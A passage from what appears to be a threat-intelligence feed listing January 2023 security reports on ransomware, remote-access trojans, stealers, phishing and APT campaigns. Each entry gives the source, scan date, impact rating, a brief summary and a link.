- Researchers from SecureWorks have analyzed the similarities between the Moses Staff hacktivist group persona that emerged in September 2021 and the Abraham’s Ax persona that emerged in November 2022.
Source:
https://www.secureworks.com/blog/abrahams-ax-likely-linked-to-moses-staff
—
- Intel Source:
- ASEC
- Intel Name:
- TZW_Ransomware_Distributing_in_Korea
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- ASEC researchers have discovered the distribution of the TZW ransomware, which encrypts files before adding the “TZW” file extension to the original extension.
—
- Intel Source:
- Checkpoint
- Intel Name:
- Malware_Packer_TrickGate_Using_by_Several_Malware_to_Evade_Detection
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Researchers from Checkpoint have identified that a shellcode-based packer dubbed TrickGate has been operating without attracting notice for over six years, enabling threat actors to deploy a wide range of malware such as TrickBot, Emotet, AZORult, Agent Tesla, FormBook, Cerber, Maze, and REvil over the years.
—
- Intel Source:
- Welivesecurity
- Intel Name:
- NikoWiper_Malware_Targeting_Ukraine_Energy_Sector
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- ESET researchers have analyzed the activities of selected APT groups and identified the Russia-affiliated Sandworm using another wiper malware strain dubbed NikoWiper as part of an attack that took place in October 2022 targeting an energy sector company in Ukraine.
Source:
https://www.welivesecurity.com/wp-content/uploads/2023/01/eset_apt_activity_report_t32022.pdf
—
- Intel Source:
- Esentire
- Intel Name:
- Changes_in_the_IcedID_malware_strategy
- Date of Scan:
- 2023-02-01
- Impact:
- MEDIUM
- Summary:
- In December 2022, the eSentire threat intelligence team observed IcedID infections that were traced to payloads downloaded by users from the Internet. This observation matched a general uptick in successful IcedID infections in Q4 2022, which accounted for 35% of IcedID incidents for the period between January 2022 and January 2023. The observed IcedID infections originated exclusively via drive-by attacks, specifically Google Search Ads targeting common applications.
Source:
https://www.esentire.com/blog/icedid-malware-shifts-its-delivery-strategy
—
- Intel Source:
- Quickheal
- Intel Name:
- LockBit_s_new_Black_variant_attack
- Date of Scan:
- 2023-02-01
- Impact:
- MEDIUM
- Summary:
- The Quickheal team investigated and analyzed LockBit’s new Black variant attack. They determined that the new LockBit 3.0 variant has a high-impact infection vector and attack chain exhibiting substantial anti-forensic activity. This variant is capable of clearing event logs, killing multiple tasks, and deleting services simultaneously. It can also obtain initial access to the victim’s network via SMB brute forcing from various IPs.
Source:
https://blogs.quickheal.com/uncovering-lockbit-blacks-attack-chain-and-anti-forensic-activity/
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Google_Ads_Targeting_Password_Manager
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Researchers from Malwarebytes have identified a new malvertising campaign that makes use of Google Ads to target users looking for password managers.
—
- Intel Source:
- Resecurity
- Intel Name:
- New_Version_of_Nevada_Ransomware
- Date of Scan:
- 2023-02-01
- Impact:
- MEDIUM
- Summary:
- Resecurity researchers have identified a new version of Nevada Ransomware which recently emerged on the Dark Web right before the start of 2023. The actors behind this new project have an affiliate platform first introduced on the RAMP underground community, which is known for initial access brokers (IABs) and other cybercriminal actors and ransomware groups.
Source:
https://resecurity.com/blog/article/nevada-ransomware-waiting-for-the-next-dark-web-jackpot
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Emails_Circulating_With_Requests_for_Product_Quotation
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Researchers from ASEC have identified phishing emails with content related to requests for product quotations. These phishing emails are all disguised to seem as if they were sent by a manager in a senior position, such as the team leader or department director of a production company or foundry, and carry .html and .htm attachments.
—
- Intel Source:
- Inky
- Intel Name:
- An_ongoing_phishing_campaign_that_impersonates_Southwest_Airlines
- Date of Scan:
- 2023-02-01
- Impact:
- LOW
- Summary:
- Last December, INKY observed and detected an ongoing phishing campaign that impersonates Southwest Airlines. Phishing emails are being sent from newly created domains, set up explicitly for these attacks.
Source:
https://www.inky.com/en/blog/fresh-phish-southwests-flying-phish-takes-off-with-your-credentials
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_16_22nd_2023
- Date of Scan:
- 2023-01-31
- Impact:
- LOW
- Summary:
- The ASEC analysis team continues to monitor weekly malware collection samples, here for January 16-22, 2023. They shared their analysis of the phishing email distribution cases seen during this week and provided statistical information on each type.
—
- Intel Source:
- TrendMicro
- Intel Name:
- The_Magniber_ransomware_spotlight
- Date of Scan:
- 2023-01-31
- Impact:
- MEDIUM
- Summary:
- After it was originally discovered in 2017, Magniber came back in 2021. It targets several Asian countries, and TrendMicro identified the exploitation of new vulnerabilities for initial access, including CVE-2021-26411, CVE-2021-40444 and, most notably, the PrintNightmare vulnerability, CVE-2021-34527.
Source:
https://www.trendmicro.com/vinfo/us/security/news/ransomware-spotlight/ransomware-spotlight-magniber
—
- Intel Source:
- Recorded Future
- Intel Name:
- Hackers_From_BlueBravo_Deploying_GraphicalNeutrino_Malware
- Date of Scan:
- 2023-01-31
- Impact:
- LOW
- Summary:
- Recorded Future researchers have identified the new malware used by BlueBravo threat group, which overlaps with Russian APT activity tracked as APT29 and NOBELIUM, which Western governments and researchers have linked to the Russian Foreign Intelligence Service (SVR).
Source:
https://www.recordedfuture.com/bluebravo-uses-ambassador-lure-deploy-graphicalneutrino-malware
—
- Intel Source:
- Sucuri
- Intel Name:
- Database_Injection_Attacks_Compromise_WordPress_Sites
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified a massive campaign that infects over 4,500 WordPress websites as part of a long-running operation. According to GoDaddy-owned Sucuri, the infections involve the injection of obfuscated JavaScript hosted on a malicious domain that’s designed to redirect visitors to undesirable sites.
—
- Intel Source:
- CERT-UA
- Intel Name:
- Hackers_From_Sandworm_Group_Targeting_News_Agencies
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Researchers from CERT-UA have identified five different data-wiping malware strains deployed on the network of the country’s national news agency (Ukrinform) on January 17th.
—
- Intel Source:
- Mandiant
- Intel Name:
- Gootkit_Malware_Updating_With_New_Components_and_Obfuscations
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Mandiant researchers have identified that the threat actors associated with the Gootkit malware have made notable changes to their toolset, adding new components and obfuscations to their infection chains.
Source:
https://www.mandiant.com/resources/blog/tracking-evolution-gootloader-operations
—
- Intel Source:
- Esentire
- Intel Name:
- The_Deep_Examination_of_Venom_Spider
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Esentire researchers have discovered the real-world identity of the threat actor behind Golden Chickens malware-as-a-service, who goes by the online persona badbullzvenom.
Source:
https://www.esentire.com/web-native-pages/unmasking-venom-spider
—
- Intel Source:
- PaloAlto
- Intel Name:
- Realtek_SDK_Vulnerability_Attempting_to_Hack_IoT_Devices
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- Researchers from PaloAlto have observed a spike in exploitation attempts weaponizing a critical remote code execution flaw in the Realtek Jungle SDK. The ongoing campaign is said to have recorded 134 million exploit attempts as of December 2022, with 97% of the attacks occurring in the past four months.
Source:
https://unit42.paloaltonetworks.com/realtek-sdk-vulnerability/#post-126726-_f37quwequ6r
—
- Intel Source:
- ESET
- Intel Name:
- Sandworm_APT_Targeting_Ukraine
- Date of Scan:
- 2023-01-30
- Impact:
- LOW
- Summary:
- ESET researchers have discovered a new Golang-based wiper, dubbed SwiftSlicer, that is used in attacks aimed at Ukraine. They also believe that the Russia-linked APT group Sandworm (aka BlackEnergy and TeleBots) is behind the wiper attacks.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_8_14th_2023
- Date of Scan:
- 2023-01-28
- Impact:
- LOW
- Summary:
- The ASEC analysis team continues to monitor weekly malware collection samples, here for January 8-14, 2023. They shared their analysis of the phishing email distribution cases seen during this week and provided statistical information on each type.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Mimic_Ransomware_Targeting_Russian_and_English_Speaking_Users
- Date of Scan:
- 2023-01-27
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have discovered a new ransomware that abuses the APIs of a legitimate tool called Everything, a Windows filename search engine developed by Voidtools that offers quick searching and real-time updates for minimal resource usage.
—
- Intel Source:
- IBM Security Intelligence
- Intel Name:
- Kronos_Malware_Increasing_its_Functionality
- Date of Scan:
- 2023-01-27
- Impact:
- LOW
- Summary:
- Researchers from IBM Security Intelligence have identified that Kronos Malware is back with new functionality. It is typically used to download other malware and has historically been used by threat actors to deliver different types of malware to victims.
—
- Intel Source:
- Cyble
- Intel Name:
- Titan_Stealer_Leveraging_GoLang
- Date of Scan:
- 2023-01-27
- Impact:
- LOW
- Summary:
- Cyble researchers have observed that threat actors are using Golang for their information stealer malware. Additionally, Titan Stealer has been spotted using multiple Command and Control (C&C) infrastructures to target new victims.
Source:
https://blog.cyble.com/2023/01/25/titan-stealer-the-growing-use-of-golang-among-threat-actors/
—
- Intel Source:
- Zscaler
- Intel Name:
- Hackers_Targeting_Tech_Layoff_Employees_With_Job_Scams
- Date of Scan:
- 2023-01-27
- Impact:
- MEDIUM
- Summary:
- Zscaler Threatlabz researchers have observed multiple suspicious job portals and surveys used by attackers to solicit information from job seekers under the guise of employment application forms. The attackers may advertise jobs online, sometimes setting up fake websites, or look for targets on social media to steal money and personal information.
—
- Intel Source:
- CISA
- Intel Name:
- Cybercriminals_Leveraging_Legitimate_RMM_software
- Date of Scan:
- 2023-01-27
- Impact:
- MEDIUM
- Summary:
- CISA researchers have identified a widespread cyber campaign involving the malicious use of legitimate RMM software. Specifically, cyber-criminal actors send phishing emails to the target to download legitimate RMM software—ScreenConnect (now ConnectWise Control) and AnyDesk—which the actors use in a refund scam to steal money from victim bank accounts.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Chinese_PlugX_Malware_Hidden_in_USB_Devices
- Date of Scan:
- 2023-01-27
- Impact:
- MEDIUM
- Summary:
- Researchers from PaloAlto have discovered a similar variant of PlugX in VirusTotal that infects USB devices and copies all Adobe PDF and Microsoft Word files from the host. It places these copies in a hidden folder on the USB device that is created by the malware.
Source:
https://unit42.paloaltonetworks.com/plugx-variants-in-usbs/
—
- Intel Source:
- Trellix
- Intel Name:
- The_Deep_Examination_of_GuLoader
- Date of Scan:
- 2023-01-27
- Impact:
- LOW
- Summary:
- Trellix researchers have analyzed the multiple archive types used by threat actors to trick users into opening an email attachment and the progression of its distribution inside NSIS (Nullsoft Scriptable Install System) executable files by showing the obfuscation and string encryption updates through the year 2022.
Source:
https://www.trellix.com/en-us/about/newsroom/stories/research/guloader-the-nsis-vantage-point.html
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Raccoon_Infostealer
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Raccoon Infostealer. It gathers private data such as credit card numbers, cryptocurrency wallet addresses, login passwords, and browser information like cookies and history.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-raccoon-infostealer-active-iocs-39
—
- Intel Source:
- Cyble
- Intel Name:
- The_rised_concern_of_Amadey_Bot
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Recently, Cyble Research and Intelligence Labs (CRIL) observed a huge spike in Amadey bot samples. This shows that threat actors are actively using this bot to infect victims’ systems with additional malware.
Source:
https://blog.cyble.com/2023/01/25/the-rise-of-amadey-bot-a-growing-concern-for-internet-security/
—
- Intel Source:
- Proofpoint
- Intel Name:
- North_Korean_Hackers_Moving_With_Credential_Harvesting
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Proofpoint have identified that a North Korean threat group well known for crypto heists has been attributed to a new wave of malicious email attacks, part of a “sprawling” credential harvesting activity targeting a number of industry verticals and marking a significant shift in its strategy.
Source:
https://www.proofpoint.com/us/blog/threat-insight/ta444-apt-startup-aimed-at-your-funds
—
- Intel Source:
- Huntress
- Intel Name:
- The_ConnectWise_Control_vulnerabilities_and_exploitation
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- During the month of December, the Huntress team followed the discussion surrounding supposed ConnectWise Control vulnerabilities and possible in-the-wild exploitation. The Huntress team has been in contact with both the ConnectWise CISO and security team, did their own research, and explained their opinion in detail.
Source:
https://www.huntress.com/blog/clearing-the-air-overblown-claims-of-vulnerabilities-exploits-severity
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Remcos_RAT
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Remcos RAT. It has been operating since 2016. This RAT was originally promoted as genuine software for remote control of Microsoft Windows from XP onwards, and is frequently found in phishing attempts due to its capacity to completely infect an afflicted machine.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-remcos-rat-active-iocs-86
—
- Intel Source:
- Rapid 7
- Intel Name:
- Critical_ManageEngine_Vulnerability_Observed
- Date of Scan:
- 2023-01-26
- Impact:
- MEDIUM
- Summary:
- Rapid7 is taking precautionary steps against the exploitation of CVE-2022-47966. Several of the affected products are extremely popular with organizations and attackers, including ADSelfService Plus and ServiceDesk Plus. Rapid7 provided a detailed analysis of CVE-2022-47966 in AttackerKB. Rapid7's vulnerability research team discovered during testing that some products may be more exploitable than others, notably ServiceDesk Plus and ADSelfService.
—
- Intel Source:
- Bitdefender
- Intel Name:
- Hackers_Leveraging_ProxyNotShell_For_Attacks
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- BitDefender researchers have started observing an increase in attacks using ProxyNotShell/OWASSRF exploit chains to target on-premises Microsoft Exchange deployments.
Source:
https://businessinsights.bitdefender.com/technical-advisory-proxyhell-exploit-chains-in-the-wild
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Ursnif_Banking_Trojan_aka_Gozi
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of the Ursnif Banking Trojan aka Gozi. Also known as Gozi and Dreambot, it has been around for more than 10 years. It gained popularity in 2015 when its source code was published on GitHub, and since then its operators have continually tweaked it to make use of their arsenal according to their aims.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Vice_Society_Ransomware_Group_Targeting_Manufacturing_Companies
- Date of Scan:
- 2023-01-26
- Impact:
- MEDIUM
- Summary:
- TrendMicro researchers have highlighted the findings of Vice Society, which includes an end-to-end infection diagram.
—
- Intel Source:
- Sentinelone
- Intel Name:
- Hackers_From_DragonSpark_Using_Golang_Malware_to_Avoid_Detection
- Date of Scan:
- 2023-01-26
- Impact:
- MEDIUM
- Summary:
- Researchers from SentinelOne have identified that companies in East Asia are being targeted by a Chinese-speaking threat actor named DragonSpark. The attacks are characterized by the use of the little-known open-source SparkRAT and malware that attempts to evade detection through Golang source code interpretation.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_APT_Group_Gamaredon
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of APT Group Gamaredon. It is a Russia-backed advanced persistent threat (APT) that has been operating since at least 2013. The group is believed to be operating out of Ukraine, and is thought to be focused on targeting Ukrainian government and military organizations, as well as individuals and organizations in the energy sector.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-apt-group-gamaredon-active-iocs-31
—
- Intel Source:
- Blackberry
- Intel Name:
- New_Evasion_Methods_For_Emotet
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- BlackBerry researchers have observed that Emotet has returned with new techniques. It has continued to steadily evolve, adding new techniques for evasion and increasing its likelihood of successful infections. It is also able to host an array of modules, each used for a different aspect of information theft, that report back to its command-and-control (C2) servers.
Source:
https://blogs.blackberry.com/en/2023/01/emotet-returns-with-new-methods-of-evasion
—
- Intel Source:
- SocInvestigation
- Intel Name:
- Cybercriminals_Using_JQuery_to_Spread_Malware
- Date of Scan:
- 2023-01-26
- Impact:
- LOW
- Summary:
- Researchers from SocInvestigation have identified that the popular JavaScript library “jQuery” is used by hackers for distributing malware.
Source:
https://www.socinvestigation.com/malicious-jquery-javascript-threat-detection-incident-response/
—
- Intel Source:
- Confiant
- Intel Name:
- Black_Friday_Day_Makes_Big_For_Malvertising
- Date of Scan:
- 2023-01-25
- Impact:
- LOW
- Summary:
- Confiant researchers have observed a cookie-stuffing campaign running across multiple programmatic ad platforms with a specific uptick in Q4 around Black Friday.
Source:
https://blog.confiant.com/malvertiser-makes-the-big-bucks-on-black-friday-637922cd5865
—
- Intel Source:
- Uptycs
- Intel Name:
- Titan_Stealer_Malware_Distributing_via_Telegram_Channel
- Date of Scan:
- 2023-01-25
- Impact:
- LOW
- Summary:
- Researchers from Uptycs have discovered a campaign involving the Titan Stealer malware, which is being marketed and sold by a threat actor (TA) through a Telegram channel for cybercrime purposes.
Source:
https://www.uptycs.com/blog/titan-stealer-telegram-malware-campaign
—
- Intel Source:
- Esentire
- Intel Name:
- A_Deep_Examination_of_Raspberry_Robin
- Date of Scan:
- 2023-01-25
- Impact:
- LOW
- Summary:
- Esentire researchers have observed 11 cases of Raspberry Robin infections since May 2022 and analyzed them.
Source:
https://www.esentire.com/blog/esentire-threat-intelligence-malware-analysis-raspberry-robin
—
- Intel Source:
- Cyfirma
- Intel Name:
- Remcos_RAT_Deployment_by_GuLoader
- Date of Scan:
- 2023-01-24
- Impact:
- LOW
- Summary:
- CYFIRMA researchers have identified the distribution of a malicious PDF file through email. It redirects the user to a cloud-based platform where they are prompted to download a ZIP file.
Source:
https://www.cyfirma.com/outofband/guloader-deploying-remcos-rat/
—
- Intel Source:
- Human Blog
- Intel Name:
- Advertisement_Fraud_Scheme_VASTFLUX_Targeted_Over_11_Million_Devices
- Date of Scan:
- 2023-01-24
- Impact:
- LOW
- Summary:
- Researchers from HUMAN’s Satori Threat Intelligence team have identified a sophisticated ad fraud scheme, dubbed VASTFLUX, that targeted more than 11 million devices.
Source:
https://www.humansecurity.com/learn/blog/traffic-signals-the-vastflux-takedown
—
- Intel Source:
- Radware
- Intel Name:
- 8220_Gang_Targeting_Vulnerable_Cloud_Providers
- Date of Scan:
- 2023-01-24
- Impact:
- LOW
- Summary:
- Radware researchers have identified that the Chinese threat group known as 8220 Gang is targeting cloud providers and poorly secured applications with a custom-built crypto miner and IRC bot.
—
- Intel Source:
- Analyst1
- Intel Name:
- Diving_Deep_into_LockBit_Ransomware
- Date of Scan:
- 2023-01-23
- Impact:
- MEDIUM
- Summary:
- Researchers from Analyst1 have analyzed the LockBit ransomware operations. It is one of the most notorious organized cybercrime syndicates that exists today.
—
- Intel Source:
- Sucuri
- Intel Name:
- Database_Infections_That_Compromise_Vulnerable_WordPress_Sites
- Date of Scan:
- 2023-01-20
- Impact:
- LOW
- Summary:
- Sucuri researchers have identified a database injection that has two different pieces of malware accomplishing two unrelated goals. The first injection redirects users to a spammy sports website and the second injection boosts authority of a spammy casino website within search engines.
—
- Intel Source:
- Fortinet
- Intel Name:
- New_CrySIS_or_Dharma_Ransomware_Variants
- Date of Scan:
- 2023-01-20
- Impact:
- MEDIUM
- Summary:
- Fortinet Labs researchers have analyzed the variants of the CrySIS/Dharma ransomware family.
—
- Intel Source:
- Mandiant
- Intel Name:
- Fortinet_Firewall_Vulnerability_Exploited_by_New_Chinese_Malware
- Date of Scan:
- 2023-01-20
- Impact:
- MEDIUM
- Summary:
- Researchers from Mandiant have identified a China-nexus threat actor who exploited a recently patched vulnerability in Fortinet FortiOS SSL-VPN as a zero-day in attacks targeting a European government entity and a managed service provider (MSP) located in Africa.
Source:
https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw
—
- Intel Source:
- Team Cymru
- Intel Name:
- The_Vidar_operators_expanding_their_infrastructure
- Date of Scan:
- 2023-01-20
- Impact:
- MEDIUM
- Summary:
- Team Cymru researchers analyzed Vidar infrastructure in their “Darth Vidar” report. Vidar operators appear to be expanding their infrastructure. Vidar is an info-stealer malware, first spotted in the wild in late 2018 by the security researcher Fumik0. The name itself (Vidar) is derived from a string found in the malware’s code. Vidar is considered to be a distinct fork of the Arkei malware family.
Source:
https://www.team-cymru.com/post/darth-vidar-the-dark-side-of-evolving-threat-infrastructure
—
- Intel Source:
- Mandiant
- Intel Name:
- Exploitation_of_FortiOS_Vulnerability_CVE_2022_42475
- Date of Scan:
- 2023-01-20
- Impact:
- HIGH
- Summary:
- Mandiant is monitoring a suspected China-nexus campaign that exploited a recently discovered vulnerability in Fortinet’s FortiOS SSL-VPN, CVE-2022-42475, as a zero-day. Mandiant discovered a new malware called “BOLDMOVE” during the investigation. They found a Windows variant of BOLDMOVE and a Linux variant, which is specifically designed to run on FortiGate Firewalls.
Source:
https://www.mandiant.com/resources/blog/chinese-actors-exploit-fortios-flaw
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Malware_samples_January_9_15th_2023
- Date of Scan:
- 2023-01-20
- Impact:
- LOW
- Summary:
- The ASEC analysis team continues to monitor weekly malware collection samples; for January 9-15th, 2023, the top malware families were SmokeLoader, BeamWinHTTP, Formbook, AgentTesla and Lokibot.
—
- Intel Source:
- TrendMicro
- Intel Name:
- Batloader_Malware_Attacks_in_Q4_2022_Used_Obfuscated_JavaScript_Files_and_Legitimate_Tools
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have identified notable Batloader campaigns that they observed in the last quarter of 2022, including the abuse of custom action scripts from the Advanced Installer software and Windows Installer XML (WiX) toolset, the use of obfuscated JavaScript files as a first-stage payload, and the use of PyArmor tool to obfuscate Batloader Python scripts.
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_STRRAT_Malware
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of STRRAT Malware. It is a Java-based Remote-Access Trojan (RAT) with a slew of malicious features, notably information theft and backdoor capabilities.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-strrat-malware-active-iocs-7
—
- Intel Source:
- Malwarebytes
- Intel Name:
- Cybersecurity_incident_on_website_of_Liquor_Control_Board_of_Ontario
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- This month, the Liquor Control Board of Ontario (LCBO) shared the news about a cybersecurity incident, affecting online sales. The cybersecurity incident was a web skimmer, which is designed to retrieve customer payment information.
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_SEO_Poisoning_attack
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- Many researchers have observed an increase in malicious search engine advertisements found in the wild, known as SEO Poisoning, which is a form of malvertising (malicious advertising) activity. There is increasing variety in the specifics of the malware delivery method, such as which searches produce the malicious advertisements and which malware is being delivered.
—
- Intel Source:
- Talos
- Intel Name:
- The_LNK_metadata_trail
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- Cisco Talos researchers analyzed metadata in LNK files that is linked to threat actors’ tactics, techniques and procedures, in order to identify their activity. The researchers’ report shares their analyses of Qakbot and Gamaredon as examples.
Source:
https://blog.talosintelligence.com/following-the-lnk-metadata-trail/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Gh0st_RAT
- Date of Scan:
- 2023-01-19
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of Gh0st RAT. It is a remote access trojan that allows an attacker to access an infected machine to harvest sensitive information and data. This type of malware enables cybercriminals to gain complete access to infected computers and attempt to hijack the user’s banking account.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-gh0st-rat-active-iocs-4
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_NJRAT
- Date of Scan:
- 2023-01-18
- Impact:
- LOW
- Summary:
- Researchers from Rewterz have identified the active IOCs of NJRAT. It is a Remote Access Trojan, which is found leveraging Pastebin to deliver a second-stage payload after initial infection.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-njrat-active-iocs-49
—
- Intel Source:
- ISC.SANS
- Intel Name:
- Malicious_Google_Ads
- Date of Scan:
- 2023-01-18
- Impact:
- LOW
- Summary:
- Researchers from SANS have identified that Google ads are a common vector for malware distribution. These ads frequently lead to fake sites impersonating web pages for legitimate software.
—
- Intel Source:
- PaloAlto
- Intel Name:
- Attacks_on_Iranian_Government_Entities_Through_Backdoor_Diplomacy
- Date of Scan:
- 2023-01-18
- Impact:
- MEDIUM
- Summary:
- PaloAlto researchers have identified that the threat actor known as Backdoor Diplomacy has been linked to a new wave of attacks targeting Iranian government entities between July and late December 2022.
—
- Intel Source:
- Cyfirma
- Intel Name:
- Abusing_Google_Ads_platform_by_various_campaigns
- Date of Scan:
- 2023-01-18
- Impact:
- LOW
- Summary:
- CYFIRMA researchers observed the campaigns closely and provided a preliminary analysis of a new RAT known as “VagusRAT” and its possible attribution to Iranian threat actors. VagusRAT is also delivered to victims by abusing Google Ads.
Source:
https://www.cyfirma.com/outofband/vagusrat-a-new-entrant-in-the-external-threat-landscape/
—
- Intel Source:
- SentinelOne
- Intel Name:
- The_observation_of_the_numerous_attacks_by_NetSupport_RAT_campaign
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Researchers from ASEC reported on a NetSupport RAT campaign that uses Pokemon as the social engineering lure. Threat actors are hosting a Pokemon-based NFT game at malicious sites, offering both fun and financial rewards.
—
- Intel Source:
- Perception-Point
- Intel Name:
- Exploitation_by_attackers_to_deliver_malware_with_Microsoft_Office_macros
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- The Perception-Point researchers discussed in their blog the similarity between Microsoft Office macros, which are widely exploited by attackers to deliver malware. They discussed similarity-based detection tactics using real-world samples that were detected in the wild.
Source:
https://perception-point.io/blog/malicious-office-macros-detecting-similarity-in-the-wild-2/
—
- Intel Source:
- ASEC
- Intel Name:
- Document_Type_Malware_Targeting_Security_Field_Workers
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- ASEC researchers have observed document-type malware distributing and targeting workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro.
—
- Intel Source:
- Sekoia
- Intel Name:
- Other_Threat_Actor_Can_Use_Raspberry_Robin
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Sekoia researchers have identified that Raspberry Robin’s attack infrastructure makes it possible for other threat actors to repurpose the infections for their own malicious activities, which makes it an even more potent threat.
Source:
https://blog.sekoia.io/raspberry-robins-botnet-second-life/
—
- Intel Source:
- CircleCI
- Intel Name:
- A_Deep_Analysis_of_CircleCI_Security_Alert
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Researchers from CircleCI have received an alert and analyzed the suspicious GitHub OAuth activity.
Source:
https://circleci.com/blog/jan-4-2023-incident-report/
—
- Intel Source:
- Rewterz
- Intel Name:
- Active_IOCs_of_Bitter_APT_Group
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- The Rewterz analyst team wrote an analysis summary of the Bitter APT Group. The APT-17 group, aka BITTER APT group, has recently been active and targeting sectors in South Asia for information theft and espionage. This group has a history of targeting Energy, Engineering, and Government in South Asia.
Source:
https://www.rewterz.com/rewterz-news/rewterz-threat-alert-bitter-apt-group-active-iocs-22
—
- Intel Source:
- Avast
- Intel Name:
- Decryption_Tool_For_BianLian_Ransomware_Released_by_Avast
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Avast researchers have released a free decryptor for the BianLian ransomware strain to help victims of the malware recover locked files without paying the hackers.
Source:
https://decoded.avast.io/threatresearch/decrypted-bianlian-ransomware/
—
- Intel Source:
- TrendMicro
- Intel Name:
- Hackers_Using_Middle_Eastern_Geopolitical_Themed_to_Distribute_NjRAT
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Researchers from TrendMicro have identified an active campaign that is using Middle Eastern geopolitical themes as a lure to target potential victims in the Middle East and Africa. In this campaign, Earth Bogle, the threat actor uses public cloud storage services such as files.fm and failiem.lv to host malware, while compromised web servers distribute NjRAT.
—
- Intel Source:
- ASEC
- Intel Name:
- ASEC_Weekly_Phishing_Email_Threats_analyses_January_1_7_2023
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- The ASEC analysis team continues to monitor phishing email threats with their automatic sample analysis system (RAPIT) and honeypot. Their post explains the samples from the distribution of phishing emails during the week from January 1st, 2023 to January 7th, 2022. The most prevalent threat type observed in phishing email attachments was FakePage, taking up 58%. FakePages are web pages where the threat actor has duplicated the screen layout, logo, and font of real login pages or advertising pages, leading users to enter their account and password information.
—
- Intel Source:
- Fortinet
- Intel Name:
- Three_PyPI_Package_Spreading_Malware_to_Developer_Systems
- Date of Scan:
- 2023-01-17
- Impact:
- MEDIUM
- Summary:
- Fortinet researchers have identified that a threat actor named Lolip0p has uploaded three rogue packages to the Python Package Index (PyPI) repository that are designed to drop malware on compromised developer systems.
—
- Intel Source:
- ASEC
- Intel Name:
- A_manuscript_Solicitation_Letter_was_disguised_by_malware
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- On January 8th, the ASEC analysis team discovered a document-type malware targeting workers in the security field. The obtained malware uses an external object within a Word document to execute an additional malicious macro.
—
- Intel Source:
- ASEC
- Intel Name:
- Phishing_Email_Targeting_National_Tax_Service
- Date of Scan:
- 2023-01-17
- Impact:
- LOW
- Summary:
- Researchers from ASEC have discovered that a phishing email impersonating the National Tax Service is being distributed.
—
- Intel Source:
- Crep1x
- Intel Name:
- Vidar_Stealer_Attack_Campaign_impersonating_AnyDesk
- Date of Scan:
- 2023-01-15
- Impact:
- LOW
- Summary:
- A typosquatting attack campaign was found in the wild impersonating multiple legitimate RMM tools and redirecting users to fake AnyDesk websites that trigger a Vidar Stealer payload download through Dropbox.
Source:
https://twitter.com/crep1x/status/1612199364805660673
—
- Intel Source:
